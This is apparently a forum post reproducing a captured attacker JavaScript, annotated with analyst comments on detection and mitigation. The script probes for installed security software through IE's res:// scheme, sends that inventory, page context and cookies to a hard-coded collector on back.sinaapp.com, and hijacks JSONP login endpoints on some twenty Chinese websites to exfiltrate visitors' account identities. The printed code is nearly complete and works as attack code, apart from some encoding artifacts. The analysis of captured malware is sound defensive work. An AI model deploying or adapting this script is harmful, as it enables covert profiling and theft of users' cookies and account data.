抓到一个搞APT的JS
代码具体有什么用我就不说了,有多屌自己看撒。
// Uses JavaScript together with the res:// protocol to detect whether software is installed.
//
// NOTE(review): captured attacker script, annotated for analysts; the code is left as the
// page shows it (the ‘ characters and the "¶ms" in the last tianya URL are apparently
// encoding artifacts of the hosting page standing in for ASCII ' and "&params", so the
// listing as printed does not parse). Three stages are visible:
//   1. fingerprint installed software (largely security products) via res:// in IE,
//   2. beacon that inventory plus page context to a hard-coded collection URL,
//   3. harvest logged-in identities from third-party sites by JSONP callback hijacking
//      and send every response to the same collector.
// Collection endpoint and campaign id as they appear in this sample:
//   back.sinaapp.com/index.php?do=api&id=bt1kyY
// Network-level detection of GETs to that host/path is the most direct signal.

// The havesoft variable holds the names of detected software ("no ie " if the probe never runs).
var havesoft = ‘no ie ‘;

// One probe target.
//   name - label that ends up in the beacon's softver field
//   path - drive-relative path to a PE file plus "/2/<resource id>" as used by res://
//          (the "2" segment presumably selects the bitmap resource type)
function program(name, path) { this.name = name; this.path = path; }

// Drives to enumerate; defaults to scanning C and D.
var disk=[‘c‘,‘d‘];

// soft lists common install paths of software to probe and the corresponding resource IDs.
// Most entries are antivirus / endpoint-security products, plus tools such as VMware,
// Nmap, WinSCP and TrueCrypt — a reconnaissance of the victim's defenses and role.
var soft=[new program(‘office 2003‘, ‘:\\Program Files\\Microsoft Office\\OFFICE11\\STSLIST.DLL/2/10100‘),
  new program(‘office2007‘, ‘:\\Program Files\\Microsoft Office\\Office12\\OUTLOOK.EXE/2/5500‘),
  new program(‘360安全卫士‘, ‘:\\Program Files\\360\\360Safe\\360leakfixer.exe/2/110‘),
  new program(‘360保险箱‘, ‘:\\Program Files\\360\\360safebox\\BoxChecker.exe/2/203‘),
  new program(‘WinRAR‘, ‘:\\Program Files\\WinRAR\\WinRAR.exe/2/101‘),
  new program(‘QQ 2009‘, ‘:\\Program Files\\Tencent\\QQ\\Bin\\RICHED20.DLL/2/2100‘),
  new program(‘暴风影音‘, ‘:\\Program Files\\StormII\\StormSkinRes.dll/2/193‘),
  new program(‘迅雷‘, ‘:\\Program Files\\Thunder Network\\Thunder\\Program\\Thunder.exe/2/138‘),
  new program(‘360杀毒‘, ‘:\\Program Files\\360\\360sd\\mfc42u.dll/2/26567‘),
  new program(‘Foxit Reader‘, ‘:\\Program Files\\Foxit Software\\Foxit Reader\\Foxit Reader.exe/2/279‘),
  new program(‘Visual C++ 6.0‘, ‘:\\Program Files\\Microsoft Visual Studio\\VC98\\Setup\\1033\\VC98ENT.DLL/2/101‘),
  new program(‘Visual Studio 2008‘, ‘:\\Program Files\\Microsoft Visual Studio 9.0\\Common7\\IDE\\devenv.exe/2/6609‘),
  new program(‘VMware‘, ‘:\\Program Files\\VMware\\VMware Workstation\\p2vWizard.dll/2/134‘),
  new program(‘Maxthon2‘, ‘:\\Program Files\\Maxthon2\\Maxthon.exe/2/128‘),
  new program(‘Daemon Tools lite‘, ‘:\\Program Files\\DAEMON Tools Lite\\DTCommonRes.dll/2/209‘),
  new program(‘EditPlus 3‘, ‘:\\Program Files\\EditPlus 3\\editplus.exe/2/126‘),
  new program(‘TrueCrypt‘, ‘:\\Program Files\\TrueCrypt\\TrueCrypt.exe/2/112‘),
  new program(‘Foxmail‘, ‘:\\Program Files\\Foxmail\\foxmail.exe/2/RAM‘),
  new program(‘Nod32 AntiVirus‘, ‘:\\Program Files\\ESET\\ESET NOD32 Antivirus\\mfc80.dll/2/32384‘),
  new program(‘Nmap‘, ‘:\\Program Files\\Nmap\\Uninstall.exe/2/110‘),
  new program(‘WinSCP‘, ‘:\\Program Files\\WinSCP\\WinSCP.exe/2/BBALL‘),
  new program(‘Kaspersky Internet Security 2010‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 2010\\avzkrnl.dll/2/BBALL‘),
  new program(‘瑞星杀毒‘, ‘:\\Program Files\\Rising\\Rav\\RsConfig.dll/2/100‘),
  new program(‘BitDefender 2010‘, ‘:\\Program Files\\BitDefender\\BitDefender 2010\\history.exe/2/301‘),
  new program(‘Avast4‘, ‘:\\Program Files\\Alwil Software\\Avast4\\ashAvast.exe/2/267‘),
  new program(‘Avira AntiVir Desktop‘, ‘:\\Program Files\\Avira\\AntiVir Desktop\\rcimage.dll/2/106‘),
  new program(‘F-Secure‘, ‘:\\Program Files\\F-Secure\\Anti-Virus\\fsavinst.dll/2/100‘),
  new program(‘McAfee VirusScan Enterprise‘, ‘:\\Program Files\\McAfee\\VirusScan Enterprise\\nailite.dll/2/110‘),
  new program(‘金山毒霸‘, ‘:\\Program Files\\Kingsoft\\Kingsoft Antivirus\\krecycle.exe/2/130‘),
  new program(‘趋势安全专家‘, ‘:\\Program Files\\Trend Micro\\Internet Security\\TmChLang.exe/2/30994‘),
  new program(‘Kaspersky Internet Security 6.0‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 6.0\\oeas.dll/2/206‘),
  new program(‘Kaspersky Internet Security 7.0‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 7.0\\oeas.dll/2/206‘),
  new program(‘Kaspersky Internet Security 2009‘, ‘:\\Program Files\\Kaspersky Lab\\Kaspersky Internet Security 2009\\oeas.dll/2/206‘),
  new program(‘AVG AntiVirus 9‘, ‘:\\Program Files\\AVG\\AVG9\\avguires.dll/2/100‘),
  new program(‘江民杀毒‘, ‘:\\Program Files\\JiangMin\\AntiVirus\\KvpViewer.exe/2/133‘),
  new program(‘ZoneAlarm‘, ‘:\\Program Files\\Zone Labs\\ZoneAlarm\\framewrk.dll/2/102‘),
  new program(‘我形我速4‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 4.0\\Uipares.dll/2/143‘),
  new program(‘我形我速5‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 5\\ipeBmp.dll/2/324‘),
  new program(‘我形我速6‘, ‘:\\Program Files\\Ulead Systems\\Ulead Photo Express 6\\ROBOEX32.DLL/2/145‘),
  new program(‘我形我速4‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 4.0\\Uipares.dll/2/143‘),
  new program(‘我形我速5‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 5\\ipeBmp.dll/2/324‘),
  new program(‘我形我速6‘, ‘:\\Program Files (x86)\\Ulead Systems\\Ulead Photo Express 6\\ROBOEX32.DLL/2/145‘),
  new program(‘Adobe Reader 9.0‘, ‘:\\Program Files\\Adobe\\Reader 9.0\\Reader\\AcroRd32.dll/2/103‘)];

// Loop over each drive and file; if the file's resource loads, the software is considered present.
// Only attempted when the user agent contains MSIE: res:// is an IE-specific scheme for
// reading resources out of local PE files, so a successful load reveals that the file exists.
// i, j and res are assigned without var and leak into global scope.
if(navigator.userAgent.indexOf("MSIE")>= 0) {
  havesoft =‘ ‘;
  for(i=0;i<soft.length;i++) {
    for(j=0;j<disk.length;j++) {
      var img=new Image(); // create a new Image object
      res=‘res://‘+disk[j]+soft[i].path; // load the resource via the res:// protocol
      img.src=res; // assign the res:// resource to img
      // If height != 30 or width != 28 the resource is taken to have loaded, i.e. the file
      // exists. (The author's original comment said "width 20" while the code compares
      // with 28; 30x28 is presumably the placeholder size IE reports for a failed load.)
      if(img.height!=30 || img.width != 28)
      {
        havesoft = havesoft + soft[i].name + ‘, ‘;
      }
    }
  }
}

// Stage 2: fire-and-forget beacon via an Image GET. Each value is wrapped in its own
// try/catch so a cross-origin top/opener access that throws degrades to an empty field.
// Query fields: location, toplocation, softver (the havesoft inventory) and opener.
(function(){(new Image()).src=‘http://back.sinaapp.com/index.php?do=api&id=bt1kyY&location=‘
  +escape((function(){try{return document.location.href}catch(e){return ‘‘}})())
  +‘&toplocation=‘+escape((function(){try{return top.location.href}catch(e){return ‘‘}})())
  +‘&softver=‘+escape((function(){try{return havesoft}catch(e){return ‘‘}})())
  +‘&opener=‘+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:‘‘}catch(e){return ‘‘}})());})();

// Returning true from window.onerror suppresses the browser's script-error reporting,
// so failures in the harvesting below stay invisible to the user.
window.onerror=function(){ return true; }

// Stage 3 collector base URL; every harvested payload is appended as content1=.
// Implicit global (no var).
http_server = "http://back.sinaapp.com/index.php?do=api&id=bt1kyY&content1=";

// Page/browser context collected once at load time and reported as the "info" record.
var info = {};

// Browser name/version parsed from the user agent (the regexes match old jQuery's
// browser sniffing). ua is assigned without var and becomes a global.
info.browser = function(){
  ua = navigator.userAgent.toLowerCase();
  var rwebkit = /(webkit)[ \/]([\w.]+)/;
  var ropera = /(opera)(?:.*version)?[ \/]([\w.]+)/;
  var rmsie = /(msie) ([\w.]+)/;
  var rmozilla = /(mozilla)(?:.*? rv:([\w.]+))?/;
  var match = rwebkit.exec( ua ) || ropera.exec( ua ) || rmsie.exec( ua ) || ua.indexOf("compatible") < 0 && rmozilla.exec( ua ) || [];
  return { name: match[1] || "", version: match[2] || "0" };
}();
info.url = document.location.href;
info.ua = escape(navigator.userAgent);
info.lang = navigator.language;
info.referrer = document.referrer;
info.location = window.location.href;
// Unlike the beacon above this is not guarded: it throws if the page is framed cross-origin.
info.toplocation = top.location.href;
// Exfiltrates the hosting page's non-HttpOnly cookies in full.
info.cookie = escape(document.cookie);
info.domain = document.domain;
info.title = document.title;
// Screen resolution as "WxH", empty when screen is unavailable.
info.screen = function(){
  var c = "";
  if (self.screen) { c = screen.width+"x"+screen.height; }
  return c;
}();
// Flash version: plugin enumeration in non-IE browsers, ActiveX probing (through eval)
// in IE, counting down from version 10. Constructor failures are swallowed on purpose.
info.flash = function(){
  var f="",n=navigator;
  if (n.plugins && n.plugins.length) {
    for (var ii=0;ii<n.plugins.length;ii++) {
      if (n.plugins[ii].name.indexOf(‘Shockwave Flash‘)!=-1) {
        f=n.plugins[ii].description.split(‘Shockwave Flash ‘)[1];
        break;
      }
    }
  } else if (window.ActiveXObject) {
    for (var ii=10;ii>=2;ii--) {
      try {
        var fl=eval("new ActiveXObject(‘ShockwaveFlash.ShockwaveFlash."+ii+"‘);");
        if (fl) { f=ii + ‘.0‘; break; }
      } catch(e) {}
    }
  }
  return f;
}();

// Injects a <script src=a> element into the body and optionally runs b once it has loaded
// (onload in standards browsers, onreadystatechange in IE). This is the JSONP-hijack
// vehicle: each target site's response executes in this page with the attacker-chosen
// callback name.
//   a - script URL
//   b - optional load callback
// Returns the created script element.
function inj_script(a, b) {
  var o = document.createElement("script");
  o.src = a;
  if (b) {
    if (!window.ActiveXObject) {
      o.onload = b;
    } else {
      o.onreadystatechange = function () {
        if (o.readyState == ‘loaded‘ || o.readyState == ‘complete‘) { b(); }
      }
    }
  }
  document.getElementsByTagName("body")[0].appendChild(o);
  return o;
}

// Hand-rolled serializer used in place of JSON.stringify (absent in old IE).
// Strings pass through unchanged; objects are walked with for..in (inherited enumerable
// properties included); string/number leaves are wrapped in quotes; anything else is
// emitted as-is. The output only ever feeds the exfil query string.
function json2str(o) {
  if(typeof o == ‘string‘) return o;
  var arr = [];
  var fmt = function(s) {
    if (typeof s == ‘object‘ && s != null) return json2str(s);
    return /^(string|number)$/.test(typeof s) ? "‘" + s + "‘" : s;
  }
  for (var i in o) arr.push("‘" + i + "‘:" + fmt(o[i]));
  return ‘{‘ + arr.join(‘,‘) + ‘}‘;
}

// Stage 3 callbacks. Each global name matches the callback= parameter of a JSONP endpoint
// loaded in window.onload below; when the endpoint answers with the caller's identity
// data, the payload is sent straight to the collector tagged content2=<callback name>.
// The numeric suffixes are presumably copied from the sites' own auto-generated names.
video_login_callback = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=video_login_callback"; }
e163_comment = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=e163_comment"; }
weibo_login = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=weibo_login"; }
sina_1368631232407449 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=sina_1368631232407449"; }
jingdong_service = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=jingdong_service"; }
loginInfoJson = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=loginInfoJson"; }
hxbase_json1368703155802logininfo = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=hxbase_json1368703155802logininfo"; }
jsonp1368703516133 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=jsonp1368703516133"; }
ajaxLogan_updateNickName = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=ajaxLogan_updateNickName"; }
jsonp1368705676193 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=jsonp1368705676193"; }
jsonp1368706291697 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=jsonp1368706291697"; }
jsonp1368751970360 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=jsonp1368751970360"; }
jQuery1368754535817 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=jQuery1368754535817"; }
jQuery1368758656634 = function(o){ new Image().src = http_server + escape(json2str(o)) + "&content2=jQuery1368758656634"; }

// On load: report the info record, then load each third-party JSONP endpoint with the
// attacker-controlled callback, each in its own try/catch so one failure does not stop
// the rest. Browsers of that era attach the victim's cookies to these cross-site script
// loads, so any logged-in session on one of these sites leaks account data to the
// collector; SameSite cookies and JSONP endpoints that require a CSRF token or Referer
// check are the server-side mitigations. Endpoints loaded without a callback parameter
// set globals (Blog.camp.profile, _passport, PM, sso_username, tianya_msg) that the
// setTimeout handlers read 3 s later; each handler throws (silently, see onerror) when
// its global is absent. Detection: one page loading this many unrelated passport/login
// JSONP endpoints in a burst, or any GET to the collector path, identifies this sample.
window.onload = function(){
  new Image().src = http_server + escape(json2str(info)) + "&content2=info%20";
  try{ inj_script(‘http://video.baidu.com/d?m=uss&callback=video_login_callback‘); } catch(e){}
  try{ inj_script(‘http://comment.money.163.com/reply/check.jsp?time=1367240961474&callback=e163_comment‘); } catch(e){}
  try{ inj_script(‘http://weibo.com/ajaxlogin.php?framelogin=0&callback=weibo_login‘); } catch(e){}
  try{ inj_script(‘http://i.house.sina.com.cn/sso/get_cookie.php?callback=sina_1368631232407449‘); } catch(e){}
  try{ inj_script(‘http://passport.jd.com/new/helloService.ashx?m=ls&callback=jingdong_service‘); } catch(e){}
  try{ inj_script(‘http://i.bendi.taobao.com/userLoginInfo.do?callback=loginInfoJson&t=1368683974713‘); } catch(e){}
  try{ inj_script(‘http://shequ5.tool.hexun.com/rest/checkjson.aspx?callback=hxbase_json1368703155802logininfo‘); } catch(e){}
  try{ inj_script(‘http://i.56.com/api/getHomeLink.php?callback=jsonp1368703516133‘); } catch(e){}
  try{ inj_script(‘http://my.pconline.com.cn/intf/getLogedUser.jsp?callback=ajaxLogan_updateNickName‘); } catch(e){}
  try{ inj_script(‘http://passport.mop.com/common/user-info?callback=jsonp1368705676193‘); } catch(e){}
  try{ inj_script(‘http://jiaoyou.51.com/?c=grade&a=getMyInfoJsonp&callback=jsonp1368706291697&ie=0&_=1368706293192‘); } catch(e){}
  try{ inj_script(‘http://commapi.dangdang.com/api/toolbar_ads_api.php?jsoncallback=jsonp1368751970360‘); } catch(e){}
  try{ inj_script(‘http://lc.tiexue.net/p.tx?c=jQuery1368754535817&_=1368754537944‘); } catch(e){}
  try{ inj_script(‘http://passport.game.renren.com/user/info?callback=jQuery1368758656634&_=1368758656639‘); } catch(e){}
  try{ inj_script(‘http://random.blog.sohu.com/service/profile.jsp‘); } catch(e){}
  try{ inj_script(‘http://uis.i.sohu.com/api/passport.jsp?from=roll&_=1368671343288‘); } catch(e){}
  try{ inj_script(‘http://api.t.qq.com/inbox/pm_list.php?count1=30&t=wbpm_list.js&resp_charset=UTF8&first=1&pmlang=zh_TW&r=0.36978532862849534‘); } catch(e){}
  try{ inj_script(‘http://blog.ifeng.com/misc.php?script=getusername&tm=1368689210147‘); } catch(e){}
  try{ inj_script(‘http://www.tianya.cn/api/msg?method=messagesys.selectmessage¶ms.pageSize=1¶ms.pageNo=1&_=1368693252438&var=tianya_msg‘); } catch(e){}
  // Delayed reads of globals populated by the non-callback endpoints above.
  setTimeout(function(){ var o = Blog.camp.profile; new Image().src = http_server + escape(json2str(o)) + "&content2=Blog.camp.profile"; } ,3000);
  setTimeout(function(){ var o = [_passport]; new Image().src = http_server + escape(json2str(o)) + "&content2=%5B_passport%5D"; } ,3000);
  setTimeout(function(){ var o = PM.PMListLoaded().ma+‘|‘+PM.PMListLoaded().mn+‘|‘+PM.PMListLoaded().micn; new Image().src = http_server + escape(json2str(o)) + "&content2=PM.PMListLoaded%28%29.ma%2B%27%7C%27%2BPM.PMListLoaded%28%29.mn%2B%27%7C%27%2BPM.PMListLoaded%28%29.micn"; } ,3000);
  setTimeout(function(){ var o = sso_username; new Image().src = http_server + escape(json2str(o)) + "&content2=sso_username"; } ,3000);
  setTimeout(function(){ var o = tianya_msg.data.list[0].toUserName+‘|‘+tianya_msg.data.list[0].toUserId; new Image().src = http_server + escape(json2str(o)) + "&content2=tianya_msg.data.list%5B0%5D.toUserName%2B%27%7C%27%2Btianya_msg.data.list%5B0%5D.toUserId"; } ,3000);
};